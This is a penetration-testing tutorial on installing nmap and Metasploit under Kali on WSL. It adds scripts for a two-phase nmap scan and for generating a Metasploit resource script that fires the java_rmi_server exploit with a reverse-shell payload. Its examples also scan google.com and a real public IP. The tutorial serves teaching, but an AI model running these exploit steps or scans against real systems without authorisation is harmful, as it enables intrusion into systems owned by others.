Setting up Penetration Testing Tools
Introduction
In penetration testing, a wide range of tools are used. For our purposes, we’ll be focusing on two of them: nmap and Metasploit.
This guide will demonstrate how to install these tools, particularly through the Kali Linux distribution. Kali Linux can be easily set up on Windows 10 or 11 using the Windows Subsystem for Linux (WSL).
Kali Linux
Kali Linux is a Linux distribution specifically designed for penetration testing. It comes pre-installed with many standard tools required for this purpose.
Nmap
Nmap is a network scanner used to discover hosts and enumerate open ports and the services behind them. Its primary objective in a penetration test is to map the attack surface of a target.
Metasploit
Metasploit, and specifically its console front end msfconsole, is a command-line framework that bundles a large collection of modules: auxiliary scanners, working exploits for known vulnerabilities in various servers and services, post-exploitation modules, and the payloads those exploits deliver.
Installation Guide
Installing Kali Linux on WSL for Windows 10/11
There are several ways to get these tools onto your computer. We recommend installing Kali Linux under WSL, either with a graphical desktop or in the regular way, accessing Kali from a terminal. Both methods are described below.
Common Issues
Ensure that you run PowerShell as an administrator before starting the installation.

You might encounter an error stating that hardware virtualization needs to be enabled; WSL 2 requires it to be switched on in the BIOS/UEFI firmware settings. Refer to the following resources for more information:
Installing Kali Linux
If you already have Debian, Ubuntu, or another Linux distribution set up, that should be sufficient. However, Kali Linux is the recommended distribution for penetration testing, so we’ll be installing that.
Installing WSL with Kali Linux
Follow the instructions provided on kali.org: WSL Preparations
Getting a Kali Linux GUI
The following video demonstrates similar steps that should be easy to follow:
Installing Useful Dependencies
While Kali Linux comes with many tools pre-installed, the WSL image ships with a minimal package set by default. It’s recommended to install some basic tools before getting started:
sudo apt-get update
sudo apt-get upgrade -y
sudo apt-get install vim -y # Not necessary
sudo apt-get install git -y # Not necessary
sudo apt-get install ruby-full -y # Ruby runtime used by Metasploit; apt also pulls it in as a dependency of metasploit-framework, so this line is optional
Install nmap
To install nmap on your Kali Linux (either virtual or real), run the following command in the terminal:
sudo apt-get install nmap -y
You can test that nmap is working by scanning a host. Only scan hosts you own or have permission to test; the Nmap project explicitly allows scanning scanme.nmap.org for this purpose. The example below runs nmap google.com and shows the kind of output to expect:
└─$ nmap google.com
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-09 13:04 CEST
Nmap scan report for google.com (142.250.74.78)
Host is up (0.015s latency).
Other addresses for google.com (not scanned): 2a00:1450:400f:802::200e
rDNS record for 142.250.74.78: arn09s23-in-f14.1e100.net
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
Nmap done: 1 IP address (1 host up) scanned in 4.08 seconds
Install Metasploit-Framework
Run the following command to install Metasploit-Framework:
sudo apt-get install metasploit-framework postgresql -y
After the installation is complete, you can open the Metasploit console with msfconsole. It will display some ASCII art at startup, and you should then see the prompt msf6 >.
└─$ msfconsole
(Metasploit ASCII-art banner omitted)
=[ metasploit v6.3.19-dev ]
+ -- --=[ 2318 exploits - 1215 auxiliary - 412 post ]
+ -- --=[ 1234 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use sessions -1 to interact with the last opened session
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
User Guide
Using Nmap
Nmap is a powerful tool with extensive functionality. In this guide, we will cover the basics.
By default, running nmap against an IP address scans the 1,000 most common TCP ports (a SYN scan when run as root, a TCP connect scan otherwise). UDP ports are not scanned unless you ask for them with -sU.
nmap 217.114.85.70
You can specify which ports to scan. For example, to scan all possible ports:
nmap -p1-65535 217.114.85.70
Scanning all ports can take some time. To shave off the reverse-DNS lookups, use the -n flag to disable DNS resolution; the scan itself is governed by the timing template (for example -T4), not by -n:
nmap -p1-65535 -n 217.114.85.70
Another useful flag is -A, which will “Enable OS detection, version detection, script scanning, and traceroute”, providing valuable information:
nmap -A 217.114.85.70
-sV is another useful flag: “Probe open ports to determine service/version info”.
nmap -sV 217.114.85.70
Different flags can be combined to enhance scanning capabilities. Note that -A already includes -sV, so the -sV below is redundant, and that running version detection and scripts against all 65,535 ports is the slowest possible combination:
nmap -sV -A -p1-65535 217.114.85.70
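Because version probes and scripts run against every port you hand them, the usual way to keep a full-range scan fast is to split it in two: first sweep all 65,535 TCP ports with no DNS and no probes, then run -sV only against the ports that came back open. The script below is an added example, not part of the original page: it parses nmap’s grepable output (-oG) to build the port list for the second phase. The target address and the sample -oG text are constructed; real nmap runs only when RUN_NMAP=1 is set and nmap is installed.

```shell
#!/bin/sh
# Added example: two-phase nmap scan.
#   Phase 1: all TCP ports, -n (no reverse DNS), -T4, grepable output, no probes.
#   Phase 2: -sV only on the ports phase 1 reported open.

# Read nmap -oG output on stdin and print the open TCP/UDP port numbers as a
# comma-separated list suitable for -p. In -oG, all ports of one host sit on a
# single "Host:" line, in a tab-separated "Ports:" field shaped like
#   22/open/tcp//ssh///, 80/open/tcp//http///
open_ports_from_gnmap() {
    awk -F'\t' '
        /^Host:/ {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^Ports: /) {
                    n = split(substr($i, 8), entries, ", ")
                    for (j = 1; j <= n; j++) {
                        split(entries[j], f, "/")   # f[1]=port f[2]=state f[3]=proto
                        if (f[2] == "open") print f[1]
                    }
                }
            }
        }' | sort -n -u | paste -s -d, -
}

# Constructed sample of -oG output (not a real scan); 192.168.56.101 is a
# placeholder lab address. Note the filtered 8080 entry, which must be skipped.
sample_gnmap() {
    printf '# Nmap 7.94 scan initiated as: nmap -p1-65535 -n -oG - 192.168.56.101\n'
    printf 'Host: 192.168.56.101 ()\tStatus: Up\n'
    printf 'Host: 192.168.56.101 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 1099/open/tcp//rmiregistry///, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65531)\n'
    printf '# Nmap done -- 1 IP address (1 host up) scanned\n'
}

# two_phase_scan TARGET: sweep, then version-probe only what is open.
two_phase_scan() {
    target=$1
    ports=$(nmap -p1-65535 -n -T4 -oG - "$target" | open_ports_from_gnmap)
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target" >&2
        return 1
    fi
    echo "open ports on $target: $ports" >&2
    nmap -sV -n -p "$ports" "$target"
}

# Demo: RUN_NMAP=1 ./twophase.sh 192.168.56.101 performs the real scan;
# without it the parser is exercised on the constructed sample instead.
if [ "${RUN_NMAP:-0}" = 1 ] && [ $# -ge 1 ] && command -v nmap >/dev/null 2>&1; then
    two_phase_scan "$1"
else
    sample_gnmap | open_ports_from_gnmap
fi
```

The parser keys on the state field rather than on the word "open" anywhere in the line, so ports nmap reports as filtered or open|filtered do not leak into the -sV phase.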
Nmap also offers various scripts that you can use. For example, if you have found a Windows server with SMB on port 445, you can use the smb-os-discovery script to find out the exact version of Windows.
nmap --script=smb-os-discovery -p 445 217.114.85.70
One popular vulnerability scanning script is available at: https://github.com/vulnersCom/nmap-vulners. It looks up the service versions nmap detects, so it must be combined with -sV. Here is an example of a previous scan on an HTTPS server with several vulnerabilities:
nmap --script vulners -sV 192.168.56.108

All scripts are located under /usr/share/nmap/scripts/. You can create your own scripts or download scripts and place them in that directory; after adding a script, run nmap --script-updatedb so the script database picks it up.
Using metasploit
To start the Metasploit console, enter the following command:
msfconsole
Once the console is open, you will have access to the framework’s modules. You can search for modules matching your target. For example, if you’re attacking an Apache server, you can search for what is available:
search apache
The search will return many results, and you can narrow it down with further keywords (for example search type:exploit apache). The modules you will use most are of two kinds: auxiliary modules and exploits. Auxiliary modules include scanners similar to nmap but usually more specialized, while exploits take advantage of a specific vulnerability to run a payload on the target, which can mean anything from dumping memory to opening a reverse shell.
Let’s take the java_rmi_server module as an example. First, load it with use <module>:
msf6 > use multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) >
To view the options for the module, use the info command. It will provide detailed information, including a description. You can also use show options, which gives you the essential settings needed to run the module. From there, you can identify any missing values:
msf6 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.19.119.45    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

View the full module info with the info, or info -d command.
Typically, the RHOSTS and RPORT settings are required. If RPORT is already set, you only need to set RHOSTS. Also check LHOST: for a reverse payload the target must be able to connect back to it, and the address msfconsole picks up by default under WSL (172.19.119.45 above is on the WSL NAT network) is generally not reachable from other machines, so set LHOST to an address the target can reach. Here’s a helpful tip: use setg to set values globally. This way, the settings are kept when switching between modules:
msf6 exploit(multi/misc/java_rmi_server) > setg RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
You can select different payloads depending on the context. The payload is the code the exploit runs on the target once it succeeds; in general you don’t change the exploit itself, but rather the payload it delivers, for example a plain command shell versus Meterpreter, or a reverse connection back to you versus a bind listener on the target:
msf6 exploit(multi/misc/java_rmi_server) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/ssh/interact normal No Interact with Established SSH Connection
5 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
6 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
7 payload/java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager
8 payload/java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager
9 payload/java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager
10 payload/java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager
11 payload/java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager
12 payload/java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager
13 payload/java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline
14 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
15 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
payload/generic/shell_reverse_tcp looks fun! Let’s use it. The payload can be selected by its index in the show payloads listing or by its full name:
msf6 exploit(multi/misc/java_rmi_server) > set payload 3
payload => generic/shell_reverse_tcp
Finally, you can launch the exploit using the exploit command (or run). Where the module supports it, running check first asks the target whether it appears vulnerable without firing the exploit:
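The interactive sequence above (use, setg RHOSTS, set payload, check, exploit) can be captured in a Metasploit resource script and replayed with msfconsole -r, which keeps engagements reproducible and avoids retyping the same settings. The shell function below is an added example, not code from the original page or from the Metasploit project: it validates the RHOSTS value and writes the resource script to stdout. The module, payload, addresses and port defaults are assumptions taken from the walkthrough above; msfconsole itself is never invoked by the function.

```shell
#!/bin/sh
# Added example: generate a Metasploit resource script (.rc) for msfconsole -r.
# Nothing here runs msfconsole; the script is only written to stdout.

# Accept a plain IPv4 address or an IPv4 CIDR range for RHOSTS, so that
# anything else (hostnames with shell metacharacters, typos) is rejected
# before it lands in a file that msfconsole will execute line by line.
valid_rhosts() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}(/[0-9]{1,2})?$'
}

# msf_rc RHOSTS LHOST [MODULE] [PAYLOAD] [LPORT]
# Defaults mirror the java_rmi_server walkthrough (assumed values).
msf_rc() {
    rhosts=$1
    lhost=$2
    module=${3:-exploit/multi/misc/java_rmi_server}
    payload=${4:-generic/shell_reverse_tcp}
    lport=${5:-4444}
    if ! valid_rhosts "$rhosts"; then
        echo "msf_rc: RHOSTS must be an IPv4 address or CIDR, got '$rhosts'" >&2
        return 1
    fi
    cat <<EOF
# resource script generated by msf_rc (added example)
# global values survive switching modules, as with setg in the console
setg RHOSTS $rhosts
setg LHOST $lhost
setg LPORT $lport
use $module
set payload $payload
show options
# ask the module whether the target looks vulnerable before firing
check
# -j runs the exploit as a background job; list results with: sessions -l
exploit -j
EOF
}

# Demo: write the script for the lab host used in the walkthrough.
# Usage afterwards:  msfconsole -q -r java_rmi.rc
msf_rc 192.168.56.101 172.19.119.45 > java_rmi.rc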
